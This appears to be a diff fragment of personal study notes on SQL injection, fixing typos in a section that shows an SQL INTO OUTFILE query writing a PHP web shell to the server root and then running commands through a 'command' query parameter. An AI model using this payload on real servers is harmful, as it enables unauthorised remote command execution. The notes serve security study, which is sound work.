OmarMiniesy/Notes/Security/Web Application Security/SQL Injections.md

 ```SQL
 SELECT '<?php echo system($_GET["command"]); ?>' INTO OUTFILE '/root-directory/shell.php'
 ```

-> Visiting the website with `/shell.php` at the end opens the reverse shell.
+- Visiting the website with `/shell.php` at the end opens the reverse shell.
-> Entering commands as a query parameter with name `command` exectues them.
+- Entering commands as a query parameter with name `command` executes them.

 ```
 /shell.php?command=<enter-here>